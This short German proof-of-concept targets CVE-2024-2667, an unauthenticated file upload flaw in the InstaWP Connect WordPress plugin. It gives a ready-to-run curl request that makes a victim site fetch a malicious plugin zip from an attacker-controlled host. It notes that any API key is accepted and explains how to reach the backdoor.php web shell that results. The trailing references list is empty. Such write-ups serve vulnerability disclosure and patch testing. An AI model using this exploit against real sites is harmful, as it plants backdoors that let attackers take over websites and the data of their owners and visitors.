
Dies ist ein POC für CVE-2024-2667 (InstaWP Connect – 1-Klick-WP-Staging & Migration <= 0.1.0.22 - Unauthentifizierter beliebiger Datei-Upload)
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"
api_key -> Sie können einen beliebigen gültigen oder ungültigen API-Key verwenden.
override_plugin_zip -> Pfad zur Zip-Datei, die ein bösartiges WordPress-Plugin mit einer Hintertür enthält.
Nach dem Import können Sie über http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php auf die Hintertür zugreifen (vorausgesetzt, der Verzeichnisname ist malicious-plugin und backdoor.php befindet sich in diesem Verzeichnis).
Referenzen: